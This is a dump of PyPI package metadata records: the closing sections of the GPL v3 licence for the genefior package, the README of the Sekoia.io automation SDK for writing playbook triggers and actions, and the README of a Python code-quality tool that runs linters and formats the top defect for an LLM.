c) Convey individual copies of the object code with a copy of the
written offer to provide the Corresponding Source. This
alternative is allowed only occasionally and noncommercially, and
only if you received the object code with such an offer, in accord
with subsection 6b.
d) Convey the object code by offering access from a designated
place (gratis or for a charge), and offer equivalent access to the
Corresponding Source in the same way through the same place at no
further charge. You need not require recipients to copy the
Corresponding Source along with the object code. If the place to
copy the object code is a network server, the Corresponding Source
may be on a different server (operated by you or a third party)
that supports equivalent copying facilities, provided you maintain
clear directions next to the object code saying where to find the
Corresponding Source. Regardless of what server hosts the
Corresponding Source, you remain obligated to ensure that it is
available for as long as needed to satisfy these requirements.
e) Convey the object code using peer-to-peer transmission, provided
you inform other peers where the object code and Corresponding
Source of the work are being offered to the general public at no
charge under subsection 6d.
A separable portion of the object code, whose source code is excluded
from the Corresponding Source as a System Library, need not be
included in conveying the object code work.
A "User Product" is either (1) a "consumer product", which means any
tangible personal property which is normally used for personal, family,
or household purposes, or (2) anything designed or sold for incorporation
into a dwelling. In determining whether a product is a consumer product,
doubtful cases shall be resolved in favor of coverage. For a particular
product received by a particular user, "normally used" refers to a
typical or common use of that class of product, regardless of the status
of the particular user or of the way in which the particular user
actually uses, or expects or is expected to use, the product. A product
is a consumer product regardless of whether the product has substantial
commercial, industrial or non-consumer uses, unless such uses represent
the only significant mode of use of the product.
"Installation Information" for a User Product means any methods,
procedures, authorization keys, or other information required to install
and execute modified versions of a covered work in that User Product from
a modified version of its Corresponding Source. The information must
suffice to ensure that the continued functioning of the modified object
code is in no case prevented or interfered with solely because
modification has been made.
If you convey an object code work under this section in, or with, or
specifically for use in, a User Product, and the conveying occurs as
part of a transaction in which the right of possession and use of the
User Product is transferred to the recipient in perpetuity or for a
fixed term (regardless of how the transaction is characterized), the
Corresponding Source conveyed under this section must be accompanied
by the Installation Information. But this requirement does not apply
if neither you nor any third party retains the ability to install
modified object code on the User Product (for example, the work has
been installed in ROM).
The requirement to provide Installation Information does not include a
requirement to continue to provide support service, warranty, or updates
for a work that has been modified or installed by the recipient, or for
the User Product in which it has been modified or installed. Access to a
network may be denied when the modification itself materially and
adversely affects the operation of the network or violates the rules and
protocols for communication across the network.
Corresponding Source conveyed, and Installation Information provided,
in accord with this section must be in a format that is publicly
documented (and with an implementation available to the public in
source code form), and must require no special password or key for
unpacking, reading or copying.
7. Additional Terms.
"Additional permissions" are terms that supplement the terms of this
License by making exceptions from one or more of its conditions.
Additional permissions that are applicable to the entire Program shall
be treated as though they were included in this License, to the extent
that they are valid under applicable law. If additional permissions
apply only to part of the Program, that part may be used separately
under those permissions, but the entire Program remains governed by
this License without regard to the additional permissions.
When you convey a copy of a covered work, you may at your option
remove any additional permissions from that copy, or from any part of
it. (Additional permissions may be written to require their own
removal in certain cases when you modify the work.) You may place
additional permissions on material, added by you to a covered work,
for which you have or can give appropriate copyright permission.
Notwithstanding any other provision of this License, for material you
add to a covered work, you may (if authorized by the copyright holders of
that material) supplement the terms of this License with terms:
a) Disclaiming warranty or limiting liability differently from the
terms of sections 15 and 16 of this License; or
b) Requiring preservation of specified reasonable legal notices or
author attributions in that material or in the Appropriate Legal
Notices displayed by works containing it; or
c) Prohibiting misrepresentation of the origin of that material, or
requiring that modified versions of such material be marked in
reasonable ways as different from the original version; or
d) Limiting the use for publicity purposes of names of licensors or
authors of the material; or
e) Declining to grant rights under trademark law for use of some
trade names, trademarks, or service marks; or
f) Requiring indemnification of licensors and authors of that
material by anyone who conveys the material (or modified versions of
it) with contractual assumptions of liability to the recipient, for
any liability that these contractual assumptions directly impose on
those licensors and authors.
All other non-permissive additional terms are considered "further
restrictions" within the meaning of section 10. If the Program as you
received it, or any part of it, contains a notice stating that it is
governed by this License along with a term that is a further
restriction, you may remove that term. If a license document contains
a further restriction but permits relicensing or conveying under this
License, you may add to a covered work material governed by the terms
of that license document, provided that the further restriction does
not survive such relicensing or conveying.
If you add terms to a covered work in accord with this section, you
must place, in the relevant source files, a statement of the
additional terms that apply to those files, or a notice indicating
where to find the applicable terms.
Additional terms, permissive or non-permissive, may be stated in the
form of a separately written license, or stated as exceptions;
the above requirements apply either way.
8. Termination.
You may not propagate or modify a covered work except as expressly
provided under this License. Any attempt otherwise to propagate or
modify it is void, and will automatically terminate your rights under
this License (including any patent licenses granted under the third
paragraph of section 11).
However, if you cease all violation of this License, then your
license from a particular copyright holder is reinstated (a)
provisionally, unless and until the copyright holder explicitly and
finally terminates your license, and (b) permanently, if the copyright
holder fails to notify you of the violation by some reasonable means
prior to 60 days after the cessation.
Moreover, your license from a particular copyright holder is
reinstated permanently if the copyright holder notifies you of the
violation by some reasonable means, this is the first time you have
received notice of violation of this License (for any work) from that
copyright holder, and you cure the violation prior to 30 days after
your receipt of the notice.
Termination of your rights under this section does not terminate the
licenses of parties who have received copies or rights from you under
this License. If your rights have been terminated and not permanently
reinstated, you do not qualify to receive new licenses for the same
material under section 10.
9. Acceptance Not Required for Having Copies.
You are not required to accept this License in order to receive or
run a copy of the Program. Ancillary propagation of a covered work
occurring solely as a consequence of using peer-to-peer transmission
to receive a copy likewise does not require acceptance. However,
nothing other than this License grants you permission to propagate or
modify any covered work. These actions infringe copyright if you do
not accept this License. Therefore, by modifying or propagating a
covered work, you indicate your acceptance of this License to do so.
10. Automatic Licensing of Downstream Recipients.
Each time you convey a covered work, the recipient automatically
receives a license from the original licensors, to run, modify and
propagate that work, subject to this License. You are not responsible
for enforcing compliance by third parties with this License.
An "entity transaction" is a transaction transferring control of an
organization, or substantially all assets of one, or subdividing an
organization, or merging organizations. If propagation of a covered
work results from an entity transaction, each party to that
transaction who receives a copy of the work also receives whatever
licenses to the work the party's predecessor in interest had or could
give under the previous paragraph, plus a right to possession of the
Corresponding Source of the work from the predecessor in interest, if
the predecessor has it or can get it with reasonable efforts.
You may not impose any further restrictions on the exercise of the
rights granted or affirmed under this License. For example, you may
not impose a license fee, royalty, or other charge for exercise of
rights granted under this License, and you may not initiate litigation
(including a cross-claim or counterclaim in a lawsuit) alleging that
any patent claim is infringed by making, using, selling, offering for
sale, or importing the Program or any portion of it.
11. Patents.
A "contributor" is a copyright holder who authorizes use under this
License of the Program or a work on which the Program is based. The
work thus licensed is called the contributor's "contributor version".
A contributor's "essential patent claims" are all patent claims
owned or controlled by the contributor, whether already acquired or
hereafter acquired, that would be infringed by some manner, permitted
by this License, of making, using, or selling its contributor version,
but do not include claims that would be infringed only as a
consequence of further modification of the contributor version. For
purposes of this definition, "control" includes the right to grant
patent sublicenses in a manner consistent with the requirements of
this License.
Each contributor grants you a non-exclusive, worldwide, royalty-free
patent license under the contributor's essential patent claims, to
make, use, sell, offer for sale, import and otherwise run, modify and
propagate the contents of its contributor version.
In the following three paragraphs, a "patent license" is any express
agreement or commitment, however denominated, not to enforce a patent
(such as an express permission to practice a patent or covenant not to
sue for patent infringement). To "grant" such a patent license to a
party means to make such an agreement or commitment not to enforce a
patent against the party.
If you convey a covered work, knowingly relying on a patent license,
and the Corresponding Source of the work is not available for anyone
to copy, free of charge and under the terms of this License, through a
publicly available network server or other readily accessible means,
then you must either (1) cause the Corresponding Source to be so
available, or (2) arrange to deprive yourself of the benefit of the
patent license for this particular work, or (3) arrange, in a manner
consistent with the requirements of this License, to extend the patent
license to downstream recipients. "Knowingly relying" means you have
actual knowledge that, but for the patent license, your conveying the
covered work in a country, or your recipient's use of the covered work
in a country, would infringe one or more identifiable patents in that
country that you have reason to believe are valid.
If, pursuant to or in connection with a single transaction or
arrangement, you convey, or propagate by procuring conveyance of, a
covered work, and grant a patent license to some of the parties
receiving the covered work authorizing them to use, propagate, modify
or convey a specific copy of the covered work, then the patent license
you grant is automatically extended to all recipients of the covered
work and works based on it.
A patent license is "discriminatory" if it does not include within
the scope of its coverage, prohibits the exercise of, or is
conditioned on the non-exercise of one or more of the rights that are
specifically granted under this License. You may not convey a covered
work if you are a party to an arrangement with a third party that is
in the business of distributing software, under which you make payment
to the third party based on the extent of your activity of conveying
the work, and under which the third party grants, to any of the
parties who would receive the covered work from you, a discriminatory
patent license (a) in connection with copies of the covered work
conveyed by you (or copies made from those copies), or (b) primarily
for and in connection with specific products or compilations that
contain the covered work, unless you entered into that arrangement,
or that patent license was granted, prior to 28 March 2007.
Nothing in this License shall be construed as excluding or limiting
any implied license or other defenses to infringement that may
otherwise be available to you under applicable patent law.
12. No Surrender of Others' Freedom.
If conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot convey a
covered work so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you may
not convey it at all. For example, if you agree to terms that obligate you
to collect a royalty for further conveying from those to whom you convey
the Program, the only way you could satisfy both those terms and this
License would be to refrain entirely from conveying the Program.
13. Use with the GNU Affero General Public License.
Notwithstanding any other provision of this License, you have
permission to link or combine any covered work with a work licensed
under version 3 of the GNU Affero General Public License into a single
combined work, and to convey the resulting work. The terms of this
License will continue to apply to the part which is the covered work,
but the special requirements of the GNU Affero General Public License,
section 13, concerning interaction through a network will apply to the
combination as such.
14. Revised Versions of this License.
The Free Software Foundation may publish revised and/or new versions of
the GNU General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the
Program specifies that a certain numbered version of the GNU General
Public License "or any later version" applies to it, you have the
option of following the terms and conditions either of that numbered
version or of any later version published by the Free Software
Foundation. If the Program does not specify a version number of the
GNU General Public License, you may choose any version ever published
by the Free Software Foundation.
If the Program specifies that a proxy can decide which future
versions of the GNU General Public License can be used, that proxy's
public statement of acceptance of a version permanently authorizes you
to choose that version for the Program.
Later license versions may give you additional or different
permissions. However, no additional obligations are imposed on any
author or copyright holder as a result of your choosing to follow a
later version.
15. Disclaimer of Warranty.
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
16. Limitation of Liability.
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES.
17. Interpretation of Sections 15 and 16.
If the disclaimer of warranty and limitation of liability provided
above cannot be given local legal effect according to their terms,
reviewing courts shall apply local law that most closely approximates
an absolute waiver of all civil liability in connection with the
Program, unless a warranty or assumption of liability accompanies a
copy of the Program in return for a fee.
END OF TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
state the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
<one line to give the program's name and a brief idea of what it does.>
Copyright (C) <year> <name of author>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>.
Also add information on how to contact you by electronic and paper mail.
If the program does terminal interaction, make it output a short
notice like this when it starts in an interactive mode:
<program> Copyright (C) <year> <name of author>
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it
under certain conditions; type `show c' for details.
The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License. Of course, your program's commands
might be different; for a GUI interface, you would use an "about box".
You should also get your employer (if you work as a programmer) or school,
if any, to sign a "copyright disclaimer" for the program, if necessary.
For more information on this, and how to apply and follow the GNU GPL, see
<https://www.gnu.org/licenses/>.
The GNU General Public License does not permit incorporating your program
into proprietary programs. If your program is a subroutine library, you
may consider it more useful to permit linking proprietary applications with
the library. If this is what you want to do, use the GNU Lesser General
Public License instead of this License. But first, please read
<https://www.gnu.org/licenses/why-not-lgpl.html>.
| Antimicrobial Resistance, Sequence Searching | [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: GNU General Public License v3 (GPLv3)",
"Operating System :: OS Independent"
] | [] | null | null | >=3.10 | [] | [] | [] | [] | [] | [] | [] | [
"Homepage, https://github.com/NickJD/GeneFior",
"Bug Tracker, https://github.com/NickJD/GeneFior/issues"
] | twine/6.2.0 CPython/3.11.14 | 2026-02-20T09:21:30.291160 | genefior-0.6.0.tar.gz | 54,766,306 | 73/6c/5eeb114e86195d17290f4d0dd8ffb07f1bf8f0dcbdc46db94c2b820d294b/genefior-0.6.0.tar.gz | source | sdist | null | false | 0d1bbdeaf1880a698e9ae1d3380f0e95 | 69d7b90715e5527ce686b4e8f1c6e1c9fd901c5af8d8e22a442e8d8ee44be990 | 736c5eeb114e86195d17290f4d0dd8ffb07f1bf8f0dcbdc46db94c2b820d294b | null | [
"LICENSE"
] | 0 |
2.4 | sekoia-automation-sdk | 1.22.3 | SDK to create Sekoia.io playbook modules | # Sekoia.io Automation Python SDK
[](https://github.com/SEKOIA-IO/sekoia-automation-sdk/actions/workflows/ci.yml)
[](https://codecov.io/github/SEKOIA-IO/sekoia-automation-sdk)
[](https://pypi.org/project/sekoia-automation-sdk/)
[](https://pypi.org/project/sekoia-automation-sdk/)
SDK to create Sekoia.io playbook modules.
Modules can define:
* Triggers: daemons that create events that will start a playbook run
* Actions: short-lived programs that constitute the main playbook nodes. They take arguments and produce a result.
## Create a trigger
Here is how you could define a very basic trigger:
```python
from sekoia_automation.module import Module
from sekoia_automation.trigger import Trigger
class MyTrigger(Trigger):
def run(self):
while True:
# Do some stuff
self.send_event('event_name', {'somekey': 'somevalue'})
# Maybe wait some time
if __name__ == "__main__":
module = Module()
module.register(MyTrigger)
module.run()
```
You can access the Trigger's configuration with `self.configuration` and the module configuration with `self.module.configuration`.
### Attach files to an event
You can attach files to an event so that these files are available to the playbook runs.
Here is how you could crete a file that should be available to the playbook run:
```python
import os
from sekoia_automation import constants
from sekoia_automation.trigger import Trigger
class MyTrigger(Trigger):
def run(self):
while True:
# Create a directory and a file
directory_name = "test_dir"
dirpath = os.path.join(constants.DATA_STORAGE, directory_name)
os.makedirs(dirpath)
with open(os.path.join(dirpath, "test.txt") "w") as f:
f.write("Hello !")
# Attach the file to the event
self.send_event('event_name', {'file_path': 'test.txt'}, directory_name)
# Maybe wait some time
```
Please note that:
* `send_event`'s third argument should be the path of a directory, relative to `constants.DATA_STORAGE`
* The directory will be the root of the playbook run's storage ("test.txt" will exist, not "test_dir/test.txt")
* You can ask the SDK to automatically remove the directory after it was copied with `remove_directory=True`
* You should always do `from sekoia_automation import constants` and use `constants.DATA_STORAGE` so that it is easy to mock
When attaching a single file to a playbook run, you can use the `write` function to create the file:
```python
from sekoia_automation.storage import write
from sekoia_automation.trigger import Trigger
class MyTrigger(Trigger):
def run(self):
while True:
# Simple creation of a file
filepath = write('test.txt', {'event': 'data'})
# Attach the file to the event
self.send_event('event_name', {'file_path': os.path.basename(filepath)},
os.path.dirname(directory_name))
# Maybe wait some time
```
### Persisting data to disk
Most of the time, triggers have to maintain some state do to their work properly (such as a cursor).
In order to make sure that this data survives a reboot of the Trigger (which can happen with no reason),
it is useful to persist it to the trigger's storage.
When the manipulated data is JSON serializable, it is recommended to use the `PersistentJSON` class to do
so (instead of `shelve`). Used as a context manager, this class will make sure the python dict is properly
synchronised:
```python
from sekoia_automation.trigger import Trigger
from sekoia_automation.storage import PersistentJSON
class MyTrigger(Trigger):
def run(self):
while True:
# Read and update state
with PersistentJSON('cache.json') as cache:
# Use cache as you would use a normal python dict
```
## Create an action
Here is how you could define a very basic action that simply adds its arguments as result:
```python
from sekoia_automation.module import Module
from sekoia_automation.action import Action
class MyAction(Action):
def run(self, arguments):
return arguments # Return value should be a JSON serializable dict
if __name__ == "__main__":
module = Module()
module.register(MyAction)
module.run()
```
There are a few more things you can do within an Action:
* Access the Module's configuration with `self.module.configuration`
* Add log messages with `self.log('message', 'level')`
* Activate an output branch with `self.set_output('malicious')` or explicitely disable another with `self.set_output('benign', False)`
* Raise an error with `self.error('error message')`. Note that raised exceptions that are not catched by your code will be automatically handled by the SDK
### Working with files
Actions can read and write files the same way a Trigger can:
```python
from sekoia_automation import constants
filepath = os.path.join(constants.DATA_STORAGE, "test.txt")
```
It is a common pattern to accept JSON arguments values directly or inside a file. The SDK provides an helper to easily read such arguments:
```python
class MyAction(Action):
def run(self, arguments):
test = self.json_argument("test", arguments)
# Do somehting with test
```
The value will automatically be fetched from `test` if present, or read from the file at `test_path`.
The SDK also provides an helper to do the opposite with results:
```python
class MyAction(Action):
def run(self, arguments):
return self.json_result("test", {"some": "value"})
```
This will create a dict with `test_path` by default or `test` if the last argument was passed directly.
## Same Docker Image for several items
In most cases, it makes sense to define several triggers and / or actions sharing the same code and the same docker image.
In this case, here is how you should define the main:
```python
if __name__ == "__main__":
module = Module()
module.register(Trigger1, "command_trigger1")
module.register(Trigger2, "command_trigger2")
module.register(Action1, "command_action1")
module.register(Action2, "command_action2")
module.run()
```
The corresponding commands need to be correctly set in the manifests as "docker_parameters".
## Use with Pydantic
It is recommended to use Pydantic to develop new modules. This should ease development.
### Module Configuration
A pydantic model can be used as `self.module.configuration` by adding type hints:
```python
class MyConfigurationModel(BaseModel):
field: str
class MyModule(Module):
configuration: MyConfiguration
class MyAction(Action):
module: MyModule
```
### Triggers
The Trigger configuration can also be a pydantic model by adding a type hint:
```python
class MyTrigger(Trigger):
configuration: MyConfigurationModel
```
You can also specify the model of created events by setting the `results_model` attribute:
```python
class Event(BaseModel):
field: str = "value"
class MyTrigger(Trigger):
results_model = Event
```
### Actions
You can use a pydantic model as action arguments by adding a type hint:
```python
class ActionArguments(BaseModel):
field: str = "value"
class MyAction(Action):
def run(self, arguments: ActionArguments):
...
```
The model of results can also be specified by setting the `results_model` attribute:
```python
class Results(BaseModel):
field: str = "value"
class MyAction(action):
results_model = Results
```
### Automatically generating manifests
When using pydantic models to describe configurations, arguments and results, manifests
can be automatically generated:
```
$ uv run sekoia-automation generate-files
```
This will do the following:
* Generate `main.py`
* Generate a manifest for each action
* Generate a manifest for each trigger
* Update the module's manifest
For better results, it is recommended to set the `name` and `description` attributes in Actions
and Triggers.
| text/markdown | Sekoia.io | null | null | null | null | SDK, Sekoia.io, automation, playbook | [
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Topic :: Security",
"Topic :: Software Development :: Libraries"
] | [] | null | null | <4,>=3.11 | [] | [] | [] | [
"aiobotocore<3,>=2.20.0",
"aiocsv<2,>=1.2.4",
"aiofiles<24,>=23.1.0",
"aiohttp<4,>=3.8.4",
"aiolimiter<2,>=1.1.0",
"black>=25.11.0",
"boto3<2,>=1.36.23",
"cachetools>=6.2.3",
"cookiecutter<3,>=2.1",
"flask<4,>=3.1.2",
"jinja2<4,>=3.0.3",
"jsonschema<5,>=4.22.0",
"loguru<0.8,>=0.7.0",
"orjson<4,>=3.8",
"prometheus-client",
"pydantic<3,>=2.10",
"python-slugify<6,>=5.0.2",
"pyyaml<7,>=6.0",
"requests-ratelimiter<0.8,>=0.7.0",
"requests<3,>=2.25",
"s3path<0.7,>=0.6.4",
"sentry-sdk",
"tenacity",
"typer>=0.20",
"uv"
] | [] | [] | [] | [
"Homepage, https://sekoia.io/",
"Repository, https://github.com/SEKOIA-IO/sekoia-automation-sdk",
"Documentation, https://docs.sekoia.io/"
] | uv/0.10.4 {"installer":{"name":"uv","version":"0.10.4","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Ubuntu","version":"24.04","id":"noble","libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":true} | 2026-02-20T09:21:23.702338 | sekoia_automation_sdk-1.22.3-py3-none-any.whl | 94,545 | 66/20/9f7fef193733a739f3f8728a5b9e2b79f73772cacdca3bed34b47b96cc5e/sekoia_automation_sdk-1.22.3-py3-none-any.whl | py3 | bdist_wheel | null | false | 469c064bad323d4fbc961c02b47f340a | 3d19bad210b9baf051ca54fbeb47b83084ce16d5586e693b1a6268bce698df8f | 66209f7fef193733a739f3f8728a5b9e2b79f73772cacdca3bed34b47b96cc5e | MIT | [
"LICENSE"
] | 253 |
2.4 | python-code-quality | 0.1.8 | Python Code Quality Analysis Tool - feed the results from 11 CQ tools straight into an LLM. Minimal tokens. | # CQ - Python Code Quality Analysis Tool
Feed the results from 11+ code quality tools to an LLM. Minimal tokens.
The primary workflow is:
```bash
# get the single most critical defect as markdown
cq check . -o llm
```
Selects the single most critical defect using this priority order:
1. **Severity** — tools with score below `error_threshold` come before those only below `warning_threshold`
2. **Order** — among tools at the same severity, lower-order tools win (compile before lint before style)
3. **Score** — among ties, the lower score wins
The code context is expanded if available.
```md
`data/problems/travelling_salesman/ts_bad.py:21` — **F841**: Local variable `unused_variable` is assigned to but never used
18: min_dist = float("inf")
19: nearest_city = None
20: for city in cities:
21: unused_variable = 67
22: dist = calc_dist(current_city, city)
23: if dist < min_dist:
24: min_dist = dist
25: nearest_city = city
Please fix only this issue. After fixing, run `cq check . -o llm` to verify.
```
Feed to an LLM with edit tools and repeat until there are no issues, e.g.
```python
cq check . -o llm | claude -p "fix this"
# or
cq check . -o llm | ollama gpt-oss:20b "Explain how to fix this"
```
## Install
```bash
# install the `cq` command line tool from PyPi
uv tool install python-code-quality
# or, clone it then install
git pull https://github.com/rhiza-fr/py-cq.git
cd py-cq
uv tool install .
```
## Tools
These tools are run in **parallel** except when looking for the first error in -o llm mode:
| Order | Tool | Measures |
|----------|------|----------|
| 1 | compileall | Syntax errors |
| 2 | bandit | Security vulnerabilities |
| 3 | ruff | Lint / style |
| 4 | ty | Type errors |
| 5 | pytest | Test pass rate |
| 6 | coverage | Test coverage |
| 7 | radon cc | Cyclomatic complexity |
| 8 | radon mi | Maintainability index |
| 9 | radon hal | Halstead volume / bug estimate |
| 10 | vulture | Dead code |
| 11 | interrogate | Docstring coverage |
Diskcache is used to cache tool output for lightning fast re-runs. Sane defaults: <100 Mb, <5 days, No pickle
## Usage
```bash
cq check . # Table overview of scores for humans
cq check -o llm # Top defect as markdown for LLMs
cq check . -o score # Numeric score only for CI
cq check . -o json # Detailed parsed JSON output for jq
cq check . -o raw # Raw tool output for debug
cq check path/to/file.py # Just one file (skips pytest and coverage)
cq check . --workers 1 # Run sequentially if you like things slow
cq check . --clear-cache # Clear cached results before running (rarely needed)
cq config path/to/project/ # Show effective tool configuration
```
## Table output
```bash
> cq check .
```
```python
┏━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━┳━━━━━━━━━━┓
┃ Tool ┃ Time ┃ Metric ┃ Score ┃ Status ┃
┡━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━╇━━━━━━━━━━┩
│ compile │ 0.42s │ compile │ 1.000 │ OK │
│ bandit │ 0.56s │ security │ 1.000 │ OK │
│ ruff │ 0.17s │ lint │ 1.000 │ OK │
│ ty │ 0.33s │ type_check │ 1.000 │ OK │
│ pytest │ 0.91s │ tests │ 1.000 │ OK │
│ coverage │ 1.26s │ coverage │ 0.910 │ OK │
│ radon cc │ 0.32s │ simplicity │ 0.982 │ OK │
│ radon mi │ 0.38s │ maintainability │ 0.869 │ OK │
│ radon hal │ 0.30s │ file_bug_free │ 0.928 │ OK │
│ radon hal │ │ file_smallness │ 0.851 │ OK │
│ radon hal │ │ functions_bug_free │ 0.913 │ OK │
│ radon hal │ │ functions_smallness │ 0.724 │ OK │
│ vulture │ 0.32s │ dead_code │ 1.000 │ OK │
│ interrogate │ 0.36s │ doc_coverage │ 1.000 │ OK │
│ │ │ Score │ 0.965 │ │
└──────────────────┴──────────┴───────────────────────────┴─────────┴──────────┘
```
## Single score output
```bash
> cq check . -o score
```
```python
0.9662730667181059 # this is designed to approach but not reach 1.0
```
## Json output
```bash
> cq check . -o json
```
```json
[
{
"tool_name": "compile",
"metrics": {
"compile": 1.0
},
"details": {},
"duration_s": 0.05611889995634556
}
...
]
```
## Raw output
```bash
> cq check -o raw
```
```json
[
{
"tool_name": "compile",
"command": "D:\\ai\\py-cq\\.venv\\Scripts\\python.exe -m compileall -r 10 -j 8 . -x .*venv",
"stdout": "",
"stderr": "",
"return_code": 0,
"timestamp": "2026-02-20 10:01:22"
}
...
]
```
## Configuration
Add a `[tool.cq]` section to your project's `pyproject.toml`:
```toml
[tool.cq]
# Skip tools that are slow or not relevant to your project
disable = ["coverage", "interrogate"]
# Override warning/error thresholds per tool
[tool.cq.thresholds.coverage]
warning = 0.9
error = 0.7
```
Tool IDs match the keys in `config/tools.yaml`: `compilation`, `bandit`, `ruff`, `ty`, `pytest`, `coverage`, `complexity`, `maintainability`, `halstead`, `vulture`, `interrogate`.
### Default config
```yaml
tools:
compilation:
name: "compile"
command: "{python} -m compileall -r 10 -j 8 {context_path} -x .*venv"
parser: "CompileParser"
order: 1
warning_threshold: 0.9999
error_threshold: 0.9999
bandit:
name: "bandit"
command: "{python} -m bandit -r {context_path} -f json -q -s B101 --severity-level medium --exclude {input_path_posix}/.venv,{input_path_posix}/tests"
parser: "BanditParser"
order: 2
warning_threshold: 0.9999
error_threshold: 0.8
ruff:
name: "ruff"
command: "{python} -m ruff check --output-format concise --no-cache {context_path}"
parser: "RuffParser"
order: 3
warning_threshold: 0.9999
error_threshold: 0.9
ty:
name: "ty"
command: "{python} -m ty check --output-format concise --color never {context_path}"
parser: "TyParser"
order: 4
warning_threshold: 0.9999
error_threshold: 0.8
run_in_target_env: true
extra_deps:
- ty
pytest:
name: "pytest"
command: "{python} -m pytest -v {context_path}"
parser: "PytestParser"
order: 5
warning_threshold: 0.7
error_threshold: 0.5
run_in_target_env: true
coverage:
name: "coverage"
command: "{python} -m coverage run --omit=*/tests/*,*/test_*.py -m pytest {context_path} && {python} -m coverage report --omit=*/tests/*,*/test_*.py"
parser: "CoverageParser"
order: 6
warning_threshold: 0.9
error_threshold: 0.5
run_in_target_env: true
extra_deps:
- coverage
- pytest
complexity:
name: "radon cc"
command: "{python} -m radon cc --json {context_path}"
parser: "ComplexityParser"
order: 7
warning_threshold: 0.6
error_threshold: 0.4
maintainability:
name: "radon mi"
command: "{python} -m radon mi -s --json {context_path}"
parser: "MaintainabilityParser"
order: 8
warning_threshold: 0.6
error_threshold: 0.4
halstead:
name: "radon hal"
command: "{python} -m radon hal -f --json {context_path}"
parser: "HalsteadParser"
order: 9
warning_threshold: 0.5
error_threshold: 0.3
vulture:
name: "vulture"
command: "{python} -m vulture {context_path} --min-confidence 80 --exclude .venv,dist,.*_cache,docs,.git"
parser: "VultureParser"
order: 10
warning_threshold: 0.9999
error_threshold: 0.8
interrogate:
name: "interrogate"
command: "{python} -m interrogate {context_path} -v --fail-under 0"
parser: "InterrogateParser"
order: 11
warning_threshold: 0.8
error_threshold: 0.3
```
## Respect
Many thanks to all the wonderful maintainers of :
- [compileall](https://docs.python.org/3/library/compileall.html)
- [bandit](https://github.com/PyCQA/bandit)
- [ruff](https://github.com/astral-sh/ruff)
- [ty](https://github.com/astral-sh/ty)
- [pytest](https://github.com/pytest-dev/pytest)
- [coverage.py](https://github.com/nedbat/coveragepy)
- [radon](https://github.com/rubik/radon)
- [vulture](https://github.com/jendrikseipp/vulture)
- [interrogate](https://github.com/econchick/interrogate)
- [diskcache](https://github.com/grantjenks/python-diskcache)
- [typer](https://github.com/fastapi/typer)
| text/markdown | null | Chris Kilner <chris@rhiza.fr> | null | null | null | null | [] | [] | null | null | >=3.12 | [] | [] | [] | [
"bandit>=1.8.0",
"coverage>=7.8.2",
"diskcache>=5.6.3",
"interrogate>=1.7.0",
"pytest-cov>=6.1.1",
"pytest-json-report>=1.5.0",
"pytest>=8.4.0",
"pyyaml>=6.0.2",
"radon>=6.0.1",
"rich>=14.0.0",
"ruff>=0.14.1",
"ty>=0.0.17",
"typer>=0.16.0",
"vulture>=2.14"
] | [] | [] | [] | [
"Homepage, https://github.com/rhiza-fr/py-cq",
"Repository, https://github.com/rhiza-fr/py-cq"
